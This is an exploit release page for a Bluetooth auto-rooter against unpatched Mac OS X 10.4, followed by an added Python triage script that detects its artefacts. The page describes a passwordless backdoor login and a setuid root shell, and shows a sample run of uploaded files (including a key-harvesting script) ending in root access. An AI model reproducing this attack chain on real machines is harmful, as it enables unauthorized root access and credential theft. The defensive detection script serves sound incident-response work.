GenerationTwo-10.4.tar - if you are trying to exploit 10.3 you need a different tarball!

Auto-rooter for Bluetooth-enabled Macintosh machines that are not
patched against CAN-2005-1333 and CVE-2006-1471.

The Mac OS X 10.4.1 update (Bluetooth OBEX directory traversal, CAN-2005-1333) and the
Mac OS X 10.4.7 update (launchd, CVE-2006-1471) together address the issues used
in the exploitation process.

This exploit provides a remote shell on RFCOMM channel 3. A login of
'pwned mghee', aka the 'bluetooth' user, has been added with no password. Once
logged in you should find a setuid root shell (shX) in that user's home directory.

Here is a sample run against my stock macmini with 10.4 installed and no patches.

10.4.1 may still be affected... I think they borked up the patch

This goes MUCH quicker due to not having to reboot the system. Thanks for root, launchd!
Also, launchd, thanks for the reloadttys option on launchctl! You rock.

kfinisterre@threat:~/GenerationTwo-10.4$ ./10.4-Autoroot
00:0C:41:E2:7A:EE
Connected to 00:0C:41:E2:7A:EE.
ftp> ftp> ftp> ftp> ftp> ftp> 458 bytes sent
ftp> ftp> ftp> ftp> ftp> ftp> ftp> 173324 bytes sent
ftp> ftp> 3192 bytes sent
ftp> 1464 bytes sent
ftp> 1067 bytes sent
ftp> 17000 bytes sent
ftp> 17000 bytes sent
ftp> 90812 bytes sent
ftp> 2743 bytes sent
ftp> 1658 bytes sent
ftp> 2342 bytes sent
ftp> drwxr-xr-x            Aug 16 01:54 ..
-rw-r--r--       3192 Aug 16 01:54 FailureToLaunch-ppc.pl
-rw-r--r--       1464 Aug 16 01:54 KeyHarvest.pl
-rw-r--r--       2743 Aug 16 01:54 login.config
-rw-r--r--      90812 Aug 16 01:54 mgetty
-rw-r--r--       1658 Aug 16 01:54 mgetty.config
-rw-r--r--         12 Aug 16 01:54 objc_sharing_ppc_4294967294
-rw-r--r--         36 Aug 16 01:54 objc_sharing_ppc_501
-rw-r--r--         24 Aug 16 01:54 objc_sharing_ppc_92
-rw-r--r--       1067 Aug 16 01:54 pwn
-rw-r--r--      17000 Aug 16 01:54 sh
-rw-r--r--      17000 Aug 16 01:54 shX
-rw-r--r--       2342 Aug 16 01:54 ttys
ftp> Disconnected.
Connected to 00:0C:41:E2:7A:EE.
ftp> ftp> ftp> Disconnected.
00:0C:41:E2:7A:EE
Connected to 00:0C:41:E2:7A:EE.
ftp> ftp> ftp> ftp> ftp> ftp> 458 bytes sent
ftp> ftp> ftp> ftp> ftp> ftp> ftp> 173324 bytes sent
ftp> ftp> 3192 bytes sent
ftp> 1464 bytes sent
ftp> 1067 bytes sent
ftp> 17000 bytes sent
ftp> 17000 bytes sent
ftp> 90812 bytes sent
ftp> 2743 bytes sent
ftp> 1658 bytes sent
ftp> 2342 bytes sent
ftp> drwxr-xr-x            Aug 16 01:54 ..
-rw-r--r--       3192 Aug 16 01:54 FailureToLaunch-ppc.pl
-rw-r--r--       1464 Aug 16 01:54 KeyHarvest.pl
-rw-r--r--       2743 Aug 16 01:54 login.config
-rw-r--r--      90812 Aug 16 01:54 mgetty
-rw-r--r--       1658 Aug 16 01:54 mgetty.config
-rw-r--r--         36 Aug 16 01:54 objc_sharing_ppc_501
-rw-r--r--         24 Aug 16 01:54 objc_sharing_ppc_92
-rw-r--r--       1067 Aug 16 01:54 pwn
-rw-r--r--      17000 Aug 16 01:54 sh
-rw-r--r--      17000 Aug 16 01:54 shX
-rw-r--r--       2342 Aug 16 01:54 ttys
ftp> Disconnected.
Connected to 00:0C:41:E2:7A:EE.
ftp> ftp> ftp> Disconnected.

kfinisterre@threat:~$ rfcomm connect 0 00:0C:41:E2:7A:EE 3
Connected /dev/rfcomm0 to 00:0C:41:E2:7A:EE on channel 3
Press CTRL-C for hangup

kfinisterre@threat:~$ minicom

Welcome to minicom 2.1

OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
Compiled on Nov  5 2005, 15:45:44.

Press CTRL-A Z for help on special keys

k-fs-Computer.local!login: pwned mghee
Password:
Last login: Tue Aug 15 00:45:09 on tty.Blue
Welcome to Darwin!
k-fs-Computer:~ bluetooth$ ls -al
total 48
drwxr-xr-x  4 bluetoot  666      136 15 Aug 00:45 .
drwxrwxr-t  8 root      admin    272 15 Aug 00:26 ..
-rw-------  1 bluetoot  666        5 15 Aug 00:45 .bash_history
-rwsr-xr-x  1 root      666    17000 15 Aug 00:42 shX
k-fs-Computer:~ bluetooth$ ./shX
csh: No entry for terminal type "unknown"
csh: using dumb terminal settings.
[k-fs-Computer:~] bluetoot# id
uid=0(root) gid=0(wheel) groups=0(wheel)
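Two of the on-host artefacts this run leaves behind are visible in the output above: a login served on the Bluetooth serial port (tty.Blue, via the uploaded ttys file and launchctl reloadttys) and the setuid root shX sitting in the home directory. The script below is an added triage example written for this page; it is not part of the GenerationTwo package. It parses a BSD-style /etc/ttys and flags enabled getty entries on a Bluetooth port or with a getty binary outside the expected system paths, and it picks setuid-root files out of ls -l output (plus a live os.walk equivalent). The ttys excerpt and the listing are constructed, the TRUSTED_GETTY_PREFIXES list is an assumption about a stock 10.4 box, and the /tmp/mgetty path in the sample is made up, since the page does not say where mgetty ends up.

```python
"""Post-exploitation triage for the artefacts this writeup leaves on the Mac:
an /etc/ttys entry that hands a getty to the Bluetooth serial port, and a
setuid-root shell dropped in a user's home directory.
Added example, not part of the GenerationTwo package. Sample inputs are constructed."""
import os
import re
import shlex
import stat

# Getty launch points accepted as legitimate on a stock Mac OS X 10.4 box (assumption).
TRUSTED_GETTY_PREFIXES = (
    "/usr/libexec/getty",
    "/System/Library/CoreServices/loginwindow.app/",
)

# Constructed /etc/ttys excerpt. The tty.Blue line stands in for the attacker's
# addition; its getty path is made up, the page does not say where mgetty lands.
SAMPLE_TTYS = """\
# name  getty  type  status  [secure]
console "/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow" vt100 on secure
ttyp0 none network
tty.Blue "/tmp/mgetty" unknown on secure
"""

# Constructed listing in the same shape as the ls -al output in the sample run above.
SAMPLE_LS = """\
total 48
drwxr-xr-x  4 bluetoot  666      136 15 Aug 00:45 .
-rw-------  1 bluetoot  666        5 15 Aug 00:45 .bash_history
-rwsr-xr-x  1 root      666    17000 15 Aug 00:42 shX
"""


def parse_ttys(text):
    """Parse BSD /etc/ttys records: name, getty command, terminal type, status words."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = shlex.split(line)            # getty commands with arguments are quoted
        if len(fields) < 3:
            continue
        name, getty, ttype = fields[:3]
        flags = fields[3:]
        entries.append({
            "name": name,
            "getty": getty,
            "type": ttype,
            "on": "on" in flags,              # status defaults to off when absent
            "secure": "secure" in flags,      # root may log in directly on this line
        })
    return entries


def suspicious_ttys(entries):
    """Enabled lines on a Bluetooth serial port (tty.Blue*) or with a getty outside the trusted paths."""
    hits = []
    for e in entries:
        if not e["on"]:
            continue
        program = e["getty"].split()[0] if e["getty"] else ""
        if e["name"].startswith("tty.Blue") or not program.startswith(TRUSTED_GETTY_PREFIXES):
            hits.append(e)
    return hits


LS_LINE = re.compile(
    r"^(?P<mode>[-bcdlps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+(?P<size>\d+)\s+(?P<date>.+?)\s+(?P<name>\S+)$"
)


def setuid_root_from_ls(listing):
    """Names of root-owned entries carrying the setuid bit in ls -l style output."""
    hits = []
    for line in listing.splitlines():
        m = LS_LINE.match(line.strip())
        if m and m.group("owner") == "root" and m.group("mode")[3] in "sS":
            hits.append(m.group("name"))
    return hits


def find_setuid_root(top):
    """Live equivalent: walk a tree (e.g. /Users) for root-owned setuid regular files."""
    hits = []
    for dirpath, _dirs, files in os.walk(top):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                hits.append(path)
    return hits


if __name__ == "__main__":
    for e in suspicious_ttys(parse_ttys(SAMPLE_TTYS)):
        print("ttys: getty enabled on %s via %r" % (e["name"], e["getty"]))
    for name in setuid_root_from_ls(SAMPLE_LS):
        print("setuid root in listing: %s" % name)
```

On a live host feed the real /etc/ttys to parse_ttys and point find_setuid_root at /Users; the ls parser is there so the same check can be run over listings captured from a box you cannot shell into. Any enabled tty.Blue line is worth a look regardless of which getty it names, because a stock 10.4 system has no reason to serve logins over Bluetooth.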

